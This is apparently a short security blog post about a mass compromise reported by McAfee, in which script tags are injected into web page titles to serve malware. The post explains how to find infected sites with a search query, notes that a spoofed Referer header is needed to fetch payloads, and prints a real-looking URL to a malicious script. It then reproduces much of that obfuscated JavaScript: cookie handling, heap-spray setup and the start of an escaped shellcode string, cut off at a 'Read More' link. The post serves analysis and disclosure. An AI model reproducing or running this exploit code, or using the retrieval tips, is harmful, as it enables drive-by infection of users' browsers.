McAfee is talking about a massive website compromise thats using JavaScript to drop malware. The attacker(s) is injecting tags into the title of the pages. McAfee researchers are jackholes who don't want to share the wealth and thus don't provide any links or insight into the code. However, based on the vector the attackers are using (inejcting into <title> tag) the simple Google query intitle: <script src=http will show you the sites that are infected and where you can fetch code. Some of the websites serving the Malware require you to spoof a Referer header to receive the actual malware. Here is one example with a little pass through a JavaScript analyzer. http://b.njnk.net:80/E/J.JS
var z1IlbQFl0X = 0;
var z1IlaxFl0X = 0;
var z1IlbPFl0X = 1;
var z1IlbiFl0X = 0;
var z1IlbCFl0X = 0;
var z1IlbHFl0X = 0;
var z1IlbIFl0X = 0;
var z1IlbfFl0X = "use" + "rid1" + "AF9122";
var z1IlbcFl0X = "20";
var z1IlaoFl0X = "a.n" + "jnk." + "net";
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0;
var z1IlaAFl0X = "";
var z1IlanFl0X = 0;
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0;
var z1IlamFl0X = "n" + "one";
var z1IlcqFl0X;
var z1IlaSFl0X = 0;
{
if(z1IlbQFl0X) {
document.getElementsByTagName("bod" + "y") [ 0] .innerHTML += z1IlcFFl0X + "<b" + "r>";
}
}
{
if(z1IlbQFl0X) {
alert(z1IlcFFl0X);
}
}
function x0r1aU2Z(name) {
var z1IlaFFl0X = document.cookie;
var z1IlaJFl0X = name + "=";
if(! z1IlaFFl0X) {
return null;
}
var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
if(z1IlaDFl0X == - 1) {
z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
if(z1IlaDFl0X != 0) {
return null;
}
}
else {
z1IlaDFl0X += 2;
}
var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
if(z1IlbqFl0X == - 1) {
z1IlbqFl0X = z1IlaFFl0X.length;
}
return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));
};
function x0r1aR2Z(name, value) {
var exp = new Date();
var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
exp.setTime(z1IlbVFl0X);
var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
document.cookie = z1IlbYFl0X;
};
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
while(z1IlakFl0X.length * 2 < z1IlalFl0X) {
z1IlakFl0X += z1IlakFl0X;
}
z1IlakFl0X = z1IlakFl0X.substring(0, z1IlalFl0X / 2);
return z1IlakFl0X;
};
function z1IltFl0X() {
if(z1IlaSFl0X > 0) {
return;
}
try {
var z1IlbaFl0X = 0 x0c0c0c0c;
var z1IlarFl0X = unescape("%" + "ueb55㍮%" + "u64c" + ... [ Read More (3.0k in body) ] |